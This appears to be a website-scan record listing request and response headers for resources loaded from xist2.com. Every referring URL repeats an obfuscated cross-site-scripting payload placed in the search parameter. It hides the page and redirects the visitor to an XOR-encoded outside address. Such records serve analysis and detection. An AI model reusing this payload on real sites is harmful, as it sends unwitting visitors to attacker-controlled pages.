5ae91d9c3d7b9154dcac417c3774d6dfa730577699be9c8a390c42dccff7e579

Request headers

sec-ch-ua
"Google Chrome";v="124", "Not:A-Brand";v="8", "Chromium";v="124"
Referer
https://xist2.com/?s=%22%3E%3Ciframe%20src=javascript:/*fd7%C2%A7%0D%0AOther.everywhere1%5Dforiginal%C2%A7style*/codeString=%60win%60+%60dow.par%60+%60ent.docu%60+%60ment.docu%60+%60mentEle%60+%60ment.st%60+%60yle.opa%60+%60city=0;url=%5B66,94,94,90,89,16,5,5,93,93,93,4,93,66,94,79,68,92,70,90,79,4,73,69,71,5,75,73,126,73,70,24,65,126,71,122,121,96,67,117,102,78,117,71,66,90,102,83,66,19,111,105,18,95,90,105,103,95,18,65,64,121,93,65,75,93,69,124,72,108,92,91,103,29,7,69,100,124,100,105,80,115,112,19,26,26,72,126,110,65,79,79,101,96,78,123,99,28,111,117,91,109,100,29,97,94,82,77,105,90,120,123,84,84,5,27,29,%5D;/*fwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb*/win%60+%60dow.par%60+%60ent.loca%60+%60tion.hr%60+%60ef=url.map(value=%60+String.fromCharCode(62)+%60String.fromCharCode(value%5E63)).jo%60+%60in(%27%27).concat(%27
Accept-Language
nl-NL,nl;q=0.9;q=0.9
sec-ch-ua-mobile
?0
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
sec-ch-ua-platform
"Win32"

Response headers

date
Tue, 30 Apr 2024 21:58:28 GMT
content-encoding
br
cf-cache-status
DYNAMIC
last-modified
Thu, 06 Oct 2022 01:18:48 GMT
nel
{"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server
cloudflare
etag
W/"633e2cf8-b01"
vary
Accept-Encoding
report-to
{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0PA3ZxWZCbuox0B61Vib7wK2FhLSE8ojmvyWeC98CQIK3Q%2FEV9%2BZXR2naRPYiZ%2Fx7uen2X6JAhHY9ZbqfD6tkVK7lUN26Gz8tXTgxRGXXn0tbbluY9Ae5Nx8eQE%3D"}],"group":"cf-nel","max_age":604800}
content-type
text/css
cache-control
public, max-age=2592000
cf-ray
87cacb1a6f1ba000-AMS
alt-svc
h3=":443"; ma=86400
form.css
xist2.com/wp-content/themes/xist2-v1.4/assets/css/ 		3 KB
1 KB 		Stylesheet
General
Check archive.org
Download Go to
Full URL
https://xist2.com/wp-content/themes/xist2-v1.4/assets/css/form.css
Requested by
Host: xist2.com
URL: https://xist2.com/?s=%22%3E%3Ciframe%20src=javascript:/*fd7%C2%A7%0D%0AOther.everywhere1%5Dforiginal%C2%A7style*/codeString=%60win%60+%60dow.par%60+%60ent.docu%60+%60ment.docu%60+%60mentEle%60+%60ment.st%60+%60yle.opa%60+%60city=0;url=%5B66,94,94,90,89,16,5,5,93,93,93,4,93,66,94,79,68,92,70,90,79,4,73,69,71,5,75,73,126,73,70,24,65,126,71,122,121,96,67,117,102,78,117,71,66,90,102,83,66,19,111,105,18,95,90,105,103,95,18,65,64,121,93,65,75,93,69,124,72,108,92,91,103,29,7,69,100,124,100,105,80,115,112,19,26,26,72,126,110,65,79,79,101,96,78,123,99,28,111,117,91,109,100,29,97,94,82,77,105,90,120,123,84,84,5,27,29,%5D;/*fwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb*/win%60+%60dow.par%60+%60ent.loca%60+%60tion.hr%60+%60ef=url.map(value=%60+String.fromCharCode(62)+%60String.fromCharCode(value%5E63)).jo%60+%60in(%27%27).concat(%27
Protocol
H3
Security
QUIC, , AES_128_GCM
Server
188.114.97.3 Amsterdam, Netherlands, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software
cloudflare /
Resource Hash
d515810116a5165c3d0b2ebd3f5dc01beb5a2d2c3250d7aba4254615538f5cde

Request headers

sec-ch-ua
"Google Chrome";v="124", "Not:A-Brand";v="8", "Chromium";v="124"
Referer
https://xist2.com/?s=%22%3E%3Ciframe%20src=javascript:/*fd7%C2%A7%0D%0AOther.everywhere1%5Dforiginal%C2%A7style*/codeString=%60win%60+%60dow.par%60+%60ent.docu%60+%60ment.docu%60+%60mentEle%60+%60ment.st%60+%60yle.opa%60+%60city=0;url=%5B66,94,94,90,89,16,5,5,93,93,93,4,93,66,94,79,68,92,70,90,79,4,73,69,71,5,75,73,126,73,70,24,65,126,71,122,121,96,67,117,102,78,117,71,66,90,102,83,66,19,111,105,18,95,90,105,103,95,18,65,64,121,93,65,75,93,69,124,72,108,92,91,103,29,7,69,100,124,100,105,80,115,112,19,26,26,72,126,110,65,79,79,101,96,78,123,99,28,111,117,91,109,100,29,97,94,82,77,105,90,120,123,84,84,5,27,29,%5D;/*fwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb*/win%60+%60dow.par%60+%60ent.loca%60+%60tion.hr%60+%60ef=url.map(value=%60+String.fromCharCode(62)+%60String.fromCharCode(value%5E63)).jo%60+%60in(%27%27).concat(%27
Accept-Language
nl-NL,nl;q=0.9;q=0.9
sec-ch-ua-mobile
?0
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
sec-ch-ua-platform
"Win32"

Response headers

date
Tue, 30 Apr 2024 21:58:28 GMT
content-encoding
br
cf-cache-status
DYNAMIC
last-modified
Thu, 06 Oct 2022 01:18:48 GMT
nel
{"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server
cloudflare
etag
W/"633e2cf8-a46"
vary
Accept-Encoding
report-to
{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nTw41yxcU6FVjmuB5sV6f25zmUDSWOmrlQ%2BKXC8dkxqH7QUXS4%2Bk8h3T0xRuPIKD7IR2iRR3uixupJqMCZprnbCUOq2eCLgCwpMlvTrwdqLuAZNxi0WwlNl%2F0p4%3D"}],"group":"cf-nel","max_age":604800}
content-type
text/css
cache-control
public, max-age=2592000
cf-ray
87cacb1a6f1ca000-AMS
alt-svc
h3=":443"; ma=86400
defaults.css
xist2.com/wp-content/themes/xist2-v1.4/assets/css/ 		4 KB
2 KB 		Stylesheet
General
Check archive.org
Download Go to
Full URL
https://xist2.com/wp-content/themes/xist2-v1.4/assets/css/defaults.css
Requested by
Host: xist2.com
URL: https://xist2.com/?s=%22%3E%3Ciframe%20src=javascript:/*fd7%C2%A7%0D%0AOther.everywhere1%5Dforiginal%C2%A7style*/codeString=%60win%60+%60dow.par%60+%60ent.docu%60+%60ment.docu%60+%60mentEle%60+%60ment.st%60+%60yle.opa%60+%60city=0;url=%5B66,94,94,90,89,16,5,5,93,93,93,4,93,66,94,79,68,92,70,90,79,4,73,69,71,5,75,73,126,73,70,24,65,126,71,122,121,96,67,117,102,78,117,71,66,90,102,83,66,19,111,105,18,95,90,105,103,95,18,65,64,121,93,65,75,93,69,124,72,108,92,91,103,29,7,69,100,124,100,105,80,115,112,19,26,26,72,126,110,65,79,79,101,96,78,123,99,28,111,117,91,109,100,29,97,94,82,77,105,90,120,123,84,84,5,27,29,%5D;/*fwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb*/win%60+%60dow.par%60+%60ent.loca%60+%60tion.hr%60+%60ef=url.map(value=%60+String.fromCharCode(62)+%60String.fromCharCode(value%5E63)).jo%60+%60in(%27%27).concat(%27
Protocol
H3
Security
QUIC, , AES_128_GCM
Server
188.114.97.3 Amsterdam, Netherlands, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software
cloudflare /
Resource Hash
60e06f35a0717740bdd568e418abb5927cbb01fddba56ce360dffc7b2389b7f7

Request headers

sec-ch-ua
"Google Chrome";v="124", "Not:A-Brand";v="8", "Chromium";v="124"
Referer
https://xist2.com/?s=%22%3E%3Ciframe%20src=javascript:/*fd7%C2%A7%0D%0AOther.everywhere1%5Dforiginal%C2%A7style*/codeString=%60win%60+%60dow.par%60+%60ent.docu%60+%60ment.docu%60+%60mentEle%60+%60ment.st%60+%60yle.opa%60+%60city=0;url=%5B66,94,94,90,89,16,5,5,93,93,93,4,93,66,94,79,68,92,70,90,79,4,73,69,71,5,75,73,126,73,70,24,65,126,71,122,121,96,67,117,102,78,117,71,66,90,102,83,66,19,111,105,18,95,90,105,103,95,18,65,64,121,93,65,75,93,69,124,72,108,92,91,103,29,7,69,100,124,100,105,80,115,112,19,26,26,72,126,110,65,79,79,101,96,78,123,99,28,111,117,91,109,100,29,97,94,82,77,105,90,120,123,84,84,5,27,29,%5D;/*fwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb*/win%60+%60dow.par%60+%60ent.loca%60+%60tion.hr%60+%60ef=url.map(value=%60+String.fromCharCode(62)+%60String.fromCharCode(value%5E63)).jo%60+%60in(%27%27).concat(%27
Accept-Language
nl-NL,nl;q=0.9;q=0.9
sec-ch-ua-mobile
?0
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
sec-ch-ua-platform
"Win32"

Response headers

date
Tue, 30 Apr 2024 21:58:28 GMT
content-encoding
br
cf-cache-status
DYNAMIC
last-modified
Thu, 06 Oct 2022 01:18:48 GMT
nel
{"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server
cloudflare
etag
W/"633e2cf8-115b"
vary
Accept-Encoding
report-to
{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fxm7l87hJh%2FBx44JHgmpoVpnrduv%2FCbB4u8At2UV1gohFCsOZn3OPNQCgfkmqM5m2Gi%2Bmwjnlzd2qz5L1WjZ1mmYlIjBehHCrxuVn6UtWndYkF35q%2FBEe6zRXDI%3D"}],"group":"cf-nel","max_age":604800}
content-type
text/css
cache-control
public, max-age=2592000
cf-ray
87cacb1a6f1da000-AMS
alt-svc
h3=":443"; ma=86400
main.min.css
xist2.com/wp-content/themes/xist2-v1.4/assets/css/ 		75 KB
15 KB 		Stylesheet
General
Check archive.org
Download Go to
Full URL
https://xist2.com/wp-content/themes/xist2-v1.4/assets/css/main.min.css
Requested by
Host: xist2.com
URL: https://xist2.com/?s=%22%3E%3Ciframe%20src=javascript:/*fd7%C2%A7%0D%0AOther.everywhere1%5Dforiginal%C2%A7style*/codeString=%60win%60+%60dow.par%60+%60ent.docu%60+%60ment.docu%60+%60mentEle%60+%60ment.st%60+%60yle.opa%60+%60city=0;url=%5B66,94,94,90,89,16,5,5,93,93,93,4,93,66,94,79,68,92,70,90,79,4,73,69,71,5,75,73,126,73,70,24,65,126,71,122,121,96,67,117,102,78,117,71,66,90,102,83,66,19,111,105,18,95,90,105,103,95,18,65,64,121,93,65,75,93,69,124,72,108,92,91,103,29,7,69,100,124,100,105,80,115,112,19,26,26,72,126,110,65,79,79,101,96,78,123,99,28,111,117,91,109,100,29,97,94,82,77,105,90,120,123,84,84,5,27,29,%5D;/*fwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb*/win%60+%60dow.par%60+%60ent.loca%60+%60tion.hr%60+%60ef=url.map(value=%60+String.fromCharCode(62)+%60String.fromCharCode(value%5E63)).jo%60+%60in(%27%27).concat(%27
Protocol
H3
Security
QUIC, , AES_128_GCM
Server
188.114.97.3 Amsterdam, Netherlands, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software
cloudflare /
Resource Hash
dfd056566707adc0c8fe7ddf3bdc23481860e2463129a2c18537607bc9933ef1

Request headers

sec-ch-ua
"Google Chrome";v="124", "Not:A-Brand";v="8", "Chromium";v="124"
Referer
https://xist2.com/?s=%22%3E%3Ciframe%20src=javascript:/*fd7%C2%A7%0D%0AOther.everywhere1%5Dforiginal%C2%A7style*/codeString=%60win%60+%60dow.par%60+%60ent.docu%60+%60ment.docu%60+%60mentEle%60+%60ment.st%60+%60yle.opa%60+%60city=0;url=%5B66,94,94,90,89,16,5,5,93,93,93,4,93,66,94,79,68,92,70,90,79,4,73,69,71,5,75,73,126,73,70,24,65,126,71,122,121,96,67,117,102,78,117,71,66,90,102,83,66,19,111,105,18,95,90,105,103,95,18,65,64,121,93,65,75,93,69,124,72,108,92,91,103,29,7,69,100,124,100,105,80,115,112,19,26,26,72,126,110,65,79,79,101,96,78,123,99,28,111,117,91,109,100,29,97,94,82,77,105,90,120,123,84,84,5,27,29,%5D;/*fwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb*/win%60+%60dow.par%60+%60ent.loca%60+%60tion.hr%60+%60ef=url.map(value=%60+String.fromCharCode(62)+%60String.fromCharCode(value%5E63)).jo%60+%60in(%27%27).concat(%27
Accept-Language
nl-NL,nl;q=0.9;q=0.9
sec-ch-ua-mobile
?0
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
sec-ch-ua-platform
"Win32"

Response headers

date
Tue, 30 Apr 2024 21:58:28 GMT
content-encoding
br
cf-cache-status
DYNAMIC
last-modified
Tue, 12 Mar 2024 09:43:23 GMT
nel
{"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server
cloudflare
etag
W/"65f023bb-12b41"
vary
Accept-Encoding
report-to
{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DUhSEaWqPh%2FRs6Had8BYzNKgQkyiSPUr5YosFGdw%2FMhH38%2FWhdRp91QnyUXTEIpOtdBnvs1j187OxulLyewRGSOeFUf412hlH%2F7KW7fjJWB2XJ%2BDxrvYX5eHRzk%3D"}],"group":"cf-nel","max_age":604800}
content-type
text/css
cache-control
public, max-age=2592000
cf-ray
87cacb1a6f1ea000-AMS
alt-svc
h3=":443"; ma=86400
jquery.js
xist2.com/wp-includes/js/jquery/ 		279 KB
84 KB 		Script
General
Check archive.org
Download Go to
Full URL
https://xist2.com/wp-includes/js/jquery/jquery.js
Requested by
Host: xist2.com
URL: https://xist2.com/?s=%22%3E%3Ciframe%20src=javascript:/*fd7%C2%A7%0D%0AOther.everywhere1%5Dforiginal%C2%A7style*/codeString=%60win%60+%60dow.par%60+%60ent.docu%60+%60ment.docu%60+%60mentEle%60+%60ment.st%60+%60yle.opa%60+%60city=0;url=%5B66,94,94,90,89,16,5,5,93,93,93,4,93,66,94,79,68,92,70,90,79,4,73,69,71,5,75,73,126,73,70,24,65,126,71,122,121,96,67,117,102,78,117,71,66,90,102,83,66,19,111,105,18,95,90,105,103,95,18,65,64,121,93,65,75,93,69,124,72,108,92,91,103,29,7,69,100,124,100,105,80,115,112,19,26,26,72,126,110,65,79,79,101,96,78,123,99,28,111,117,91,109,100,29,97,94,82,77,105,90,120,123,84,84,5,27,29,%5D;/*fwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb*/win%60+%60dow.par%60+%60ent.loca%60+%60tion.hr%60+%60ef=url.map(value=%60+String.fromCharCode(62)+%60String.fromCharCode(value%5E63)).jo%60+%60in(%27%27).concat(%27
Protocol
H3
Security
QUIC, , AES_128_GCM
Server
188.114.97.3 Amsterdam, Netherlands, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software
cloudflare /
Resource Hash
1e7f83052e1e3442c4397ced9555033cd1d3f08444d85960683bcf91c8433cdb

Request headers

sec-ch-ua
"Google Chrome";v="124", "Not:A-Brand";v="8", "Chromium";v="124"
Referer
https://xist2.com/?s=%22%3E%3Ciframe%20src=javascript:/*fd7%C2%A7%0D%0AOther.everywhere1%5Dforiginal%C2%A7style*/codeString=%60win%60+%60dow.par%60+%60ent.docu%60+%60ment.docu%60+%60mentEle%60+%60ment.st%60+%60yle.opa%60+%60city=0;url=%5B66,94,94,90,89,16,5,5,93,93,93,4,93,66,94,79,68,92,70,90,79,4,73,69,71,5,75,73,126,73,70,24,65,126,71,122,121,96,67,117,102,78,117,71,66,90,102,83,66,19,111,105,18,95,90,105,103,95,18,65,64,121,93,65,75,93,69,124,72,108,92,91,103,29,7,69,100,124,100,105,80,115,112,19,26,26,72,126,110,65,79,79,101,96,78,123,99,28,111,117,91,109,100,29,97,94,82,77,105,90,120,123,84,84,5,27,29,%5D;/*fwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb*/win%60+%60dow.par%60+%60ent.loca%60+%60tion.hr%60+%60ef=url.map(value=%60+String.fromCharCode(62)+%60String.fromCharCode(value%5E63)).jo%60+%60in(%27%27).concat(%27
Accept-Language
nl-NL,nl;q=0.9;q=0.9
sec-ch-ua-mobile
?0
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
sec-ch-ua-platform
"Win32"

Response headers

date
Tue, 30 Apr 2024 21:58:28 GMT
content-encoding
br
cf-cache-status
DYNAMIC
last-modified
Wed, 15 Nov 2023 13:15:02 GMT
nel
{"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server
cloudflare
etag
W/"6554c456-45a96"
vary
Accept-Encoding
report-to
{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xByvUSw8p7EdumHIIxwTz3fpvvcu5e%2Fn4i%2BOa8N%2BRNFNueyIZIcQWcojKDr9bHHfRHCEXCjPrnlau4XpvfoQPnpnVjKz6CLUoibyAlTxmdshyy2Fe1OKpGNihtY%3D"}],"group":"cf-nel","max_age":604800}
content-type
application/javascript
cache-control
public, max-age=2592000
cf-ray
87cacb1a6f1fa000-AMS
alt-svc
h3=":443"; ma=86400
jquery-migrate.js
xist2.com/wp-includes/js/jquery/ 		31 KB
11 KB 		Script
General
Check archive.org
Download Go to
Full URL
https://xist2.com/wp-includes/js/jquery/jquery-migrate.js
Requested by
Host: xist2.com
URL: https://xist2.com/?s=%22%3E%3Ciframe%20src=javascript:/*fd7%C2%A7%0D%0AOther.everywhere1%5Dforiginal%C2%A7style*/codeString=%60win%60+%60dow.par%60+%60ent.docu%60+%60ment.docu%60+%60mentEle%60+%60ment.st%60+%60yle.opa%60+%60city=0;url=%5B66,94,94,90,89,16,5,5,93,93,93,4,93,66,94,79,68,92,70,90,79,4,73,69,71,5,75,73,126,73,70,24,65,126,71,122,121,96,67,117,102,78,117,71,66,90,102,83,66,19,111,105,18,95,90,105,103,95,18,65,64,121,93,65,75,93,69,124,72,108,92,91,103,29,7,69,100,124,100,105,80,115,112,19,26,26,72,126,110,65,79,79,101,96,78,123,99,28,111,117,91,109,100,29,97,94,82,77,105,90,120,123,84,84,5,27,29,%5D;/*fwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb*/win%60+%60dow.par%60+%60ent.loca%60+%60tion.hr%60+%60ef=url.map(value=%60+String.fromCharCode(62)+%60String.fromCharCode(value%5E63)).jo%60+%60in(%27%27).concat(%27
Protocol
H3
Security
QUIC, , AES_128_GCM
Server
188.114.97.3 Amsterdam, Netherlands, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software
cloudflare /
Resource Hash
09f417c2e643b736c19e96b99e166681af1002e9b192b84e4e85b0794e764f7f

Request headers

sec-ch-ua
"Google Chrome";v="124", "Not:A-Brand";v="8", "Chromium";v="124"
Referer
https://xist2.com/?s=%22%3E%3Ciframe%20src=javascript:/*fd7%C2%A7%0D%0AOther.everywhere1%5Dforiginal%C2%A7style*/codeString=%60win%60+%60dow.par%60+%60ent.docu%60+%60ment.docu%60+%60mentEle%60+%60ment.st%60+%60yle.opa%60+%60city=0;url=%5B66,94,94,90,89,16,5,5,93,93,93,4,93,66,94,79,68,92,70,90,79,4,73,69,71,5,75,73,126,73,70,24,65,126,71,122,121,96,67,117,102,78,117,71,66,90,102,83,66,19,111,105,18,95,90,105,103,95,18,65,64,121,93,65,75,93,69,124,72,108,92,91,103,29,7,69,100,124,100,105,80,115,112,19,26,26,72,126,110,65,79,79,101,96,78,123,99,28,111,117,91,109,100,29,97,94,82,77,105,90,120,123,84,84,5,27,29,%5D;/*fwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb*/win%60+%60dow.par%60+%60ent.loca%60+%60tion.hr%60+%60ef=url.map(value=%60+String.fromCharCode(62)+%60String.fromCharCode(value%5E63)).jo%60+%60in(%27%27).concat(%27
Accept-Language
nl-NL,nl;q=0.9;q=0.9
sec-ch-ua-mobile
?0
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
sec-ch-ua-platform
"Win32"

Response headers

date
Tue, 30 Apr 2024 21:58:28 GMT
content-encoding
br
cf-cache-status
DYNAMIC
last-modified
Wed, 15 Nov 2023 13:15:02 GMT
nel
{"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server
cloudflare
etag
W/"6554c456-7cea"
vary
Accept-Encoding
report-to
{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FijHApHgs3gt4Qyf59UlI06Sk4Q01amolMc%2Bw6exM12q9HRk%2F48GnXIh5C5nYykEUzijt4Koq32MiPVma7zYUb5lteoVlniSi5srpI6cTDzxvrrK888qCZqpxzw%3D"}],"group":"cf-nel","max_age":604800}
content-type
application/javascript
cache-control
public, max-age=2592000
cf-ray
87cacb1a6f20a000-AMS
alt-svc
h3=":443"; ma=86400
cookie-law-info-public.js
xist2.com/wp-content/plugins/webtoffee-gdpr-cookie-consent/public/js/ 		53 KB
14 KB 		Script
General
Check archive.org
Download Go to
Full URL
https://xist2.com/wp-content/plugins/webtoffee-gdpr-cookie-consent/public/js/cookie-law-info-public.js
Requested by
Host: xist2.com
URL: https://xist2.com/?s=%22%3E%3Ciframe%20src=javascript:/*fd7%C2%A7%0D%0AOther.everywhere1%5Dforiginal%C2%A7style*/codeString=%60win%60+%60dow.par%60+%60ent.docu%60+%60ment.docu%60+%60mentEle%60+%60ment.st%60+%60yle.opa%60+%60city=0;url=%5B66,94,94,90,89,16,5,5,93,93,93,4,93,66,94,79,68,92,70,90,79,4,73,69,71,5,75,73,126,73,70,24,65,126,71,122,121,96,67,117,102,78,117,71,66,90,102,83,66,19,111,105,18,95,90,105,103,95,18,65,64,121,93,65,75,93,69,124,72,108,92,91,103,29,7,69,100,124,100,105,80,115,112,19,26,26,72,126,110,65,79,79,101,96,78,123,99,28,111,117,91,109,100,29,97,94,82,77,105,90,120,123,84,84,5,27,29,%5D;/*fwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb*/win%60+%60dow.par%60+%60ent.loca%60+%60tion.hr%60+%60ef=url.map(value=%60+String.fromCharCode(62)+%60String.fromCharCode(value%5E63)).jo%60+%60in(%27%27).concat(%27
Protocol
H3
Security
QUIC, , AES_128_GCM
Server
188.114.97.3 Amsterdam, Netherlands, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software
cloudflare /
Resource Hash
13f29d7e98ff4dc90831ac3586ffb4506fb25683985541f52bcaafc92fe89d86

Request headers

sec-ch-ua
"Google Chrome";v="124", "Not:A-Brand";v="8", "Chromium";v="124"
Referer
https://xist2.com/?s=%22%3E%3Ciframe%20src=javascript:/*fd7%C2%A7%0D%0AOther.everywhere1%5Dforiginal%C2%A7style*/codeString=%60win%60+%60dow.par%60+%60ent.docu%60+%60ment.docu%60+%60mentEle%60+%60ment.st%60+%60yle.opa%60+%60city=0;url=%5B66,94,94,90,89,16,5,5,93,93,93,4,93,66,94,79,68,92,70,90,79,4,73,69,71,5,75,73,126,73,70,24,65,126,71,122,121,96,67,117,102,78,117,71,66,90,102,83,66,19,111,105,18,95,90,105,103,95,18,65,64,121,93,65,75,93,69,124,72,108,92,91,103,29,7,69,100,124,100,105,80,115,112,19,26,26,72,126,110,65,79,79,101,96,78,123,99,28,111,117,91,109,100,29,97,94,82,77,105,90,120,123,84,84,5,27,29,%5D;/*fwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb*/win%60+%60dow.par%60+%60ent.loca%60+%60tion.hr%60+%60ef=url.map(value=%60+String.fromCharCode(62)+%60String.fromCharCode(value%5E63)).jo%60+%60in(%27%27).concat(%27
Accept-Language
nl-NL,nl;q=0.9;q=0.9
sec-ch-ua-mobile
?0
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
sec-ch-ua-platform
"Win32"

Response headers

date
Tue, 30 Apr 2024 21:58:28 GMT
content-encoding
br
cf-cache-status
DYNAMIC
last-modified
Wed, 15 Nov 2023 11:49:06 GMT
nel
{"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server
cloudflare
etag
W/"6554b032-d51e"
vary
Accept-Encoding
report-to
{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7IhdML9W821JczyNB%2FqSNQ5437UsA%2BTy%2BqNYg3ZP9%2BOaGo9bWCAzWj5u4%2BT5bgTE4s%2FmBmOzyV6uHwLGce%2FGB7uKgrQtABV7Zn7TgaBoDqpL71PRqVnxp7Y298k%3D"}],"group":"cf-nel","max_age":604800}
content-type
application/javascript
cache-control
public, max-age=2592000
cf-ray
87cacb1a6f21a000-AMS
alt-svc
h3=":443"; ma=86400
logo.svg
xist2.com/wp-content/themes/xist2-v1.4/assets/svg/logo/ 		1 KB
1 KB 		Image
General
Check archive.org
Download Go to Show image
Full URL
https://xist2.com/wp-content/themes/xist2-v1.4/assets/svg/logo/logo.svg
Requested by
Host: xist2.com
URL: https://xist2.com/?s=%22%3E%3Ciframe%20src=javascript:/*fd7%C2%A7%0D%0AOther.everywhere1%5Dforiginal%C2%A7style*/codeString=%60win%60+%60dow.par%60+%60ent.docu%60+%60ment.docu%60+%60mentEle%60+%60ment.st%60+%60yle.opa%60+%60city=0;url=%5B66,94,94,90,89,16,5,5,93,93,93,4,93,66,94,79,68,92,70,90,79,4,73,69,71,5,75,73,126,73,70,24,65,126,71,122,121,96,67,117,102,78,117,71,66,90,102,83,66,19,111,105,18,95,90,105,103,95,18,65,64,121,93,65,75,93,69,124,72,108,92,91,103,29,7,69,100,124,100,105,80,115,112,19,26,26,72,126,110,65,79,79,101,96,78,123,99,28,111,117,91,109,100,29,97,94,82,77,105,90,120,123,84,84,5,27,29,%5D;/*fwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb*/win%60+%60dow.par%60+%60ent.loca%60+%60tion.hr%60+%60ef=url.map(value=%60+String.fromCharCode(62)+%60String.fromCharCode(value%5E63)).jo%60+%60in(%27%27).concat(%27
Protocol
H3
Security
QUIC, , AES_128_GCM
Server
188.114.97.3 Amsterdam, Netherlands, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software
cloudflare /
Resource Hash
aaa9e669c49304ed25c07f1ce7b79f159fda7d552a04364ea303f380f5d757e2

Request headers

sec-ch-ua
"Google Chrome";v="124", "Not:A-Brand";v="8", "Chromium";v="124"
Referer
https://xist2.com/?s=%22%3E%3Ciframe%20src=javascript:/*fd7%C2%A7%0D%0AOther.everywhere1%5Dforiginal%C2%A7style*/codeString=%60win%60+%60dow.par%60+%60ent.docu%60+%60ment.docu%60+%60mentEle%60+%60ment.st%60+%60yle.opa%60+%60city=0;url=%5B66,94,94,90,89,16,5,5,93,93,93,4,93,66,94,79,68,92,70,90,79,4,73,69,71,5,75,73,126,73,70,24,65,126,71,122,121,96,67,117,102,78,117,71,66,90,102,83,66,19,111,105,18,95,90,105,103,95,18,65,64,121,93,65,75,93,69,124,72,108,92,91,103,29,7,69,100,124,100,105,80,115,112,19,26,26,72,126,110,65,79,79,101,96,78,123,99,28,111,117,91,109,100,29,97,94,82,77,105,90,120,123,84,84,5,27,29,%5D;/*fwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb*/win%60+%60dow.par%60+%60ent.loca%60+%60tion.hr%60+%60ef=url.map(value=%60+String.fromCharCode(62)+%60String.fromCharCode(value%5E63)).jo%60+%60in(%27%27).concat(%27
Accept-Language
nl-NL,nl;q=0.9;q=0.9
sec-ch-ua-mobile
?0
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
sec-ch-ua-platform
"Win32"

Response headers

date
Tue, 30 Apr 2024 21:58:28 GMT
content-encoding
br
cf-cache-status
DYNAMIC
last-modified
Thu, 06 Oct 2022 01:18:48 GMT
nel
{"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server
cloudflare
etag
W/"633e2cf8-51e"
vary
Accept-Encoding
report-to
{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BrKnWnVh%2FaCajL0Bw6OyfBZcaAFCh3YiyB1LUCjyKA5RtBFFzhIq1Z2GB4jtep3Cy6z%2F2YEn15CKMuQ2dh9Xo%2Fa%2FH%2FLp1%2BC%2BHjJ4ge9cHByhrc26Cml6e2DI5OM%3D"}],"group":"cf-nel","max_age":604800}
content-type
image/svg+xml
cache-control
public, max-age=2592000
cf-ray
87cacb1a6f22a000-AMS
alt-svc
h3=":443"; ma=86400
b38d1a98da9b43a98a551a4b47a97f5c.js
cdn.pagesense.io/js/xist2/ 		223 KB
62 KB 		Script
General
Check archive.org
Download Go to
Full URL
https://cdn.pagesense.io/js/xist2/b38d1a98da9b43a98a551a4b47a97f5c.js
Requested by
Host: xist2.com
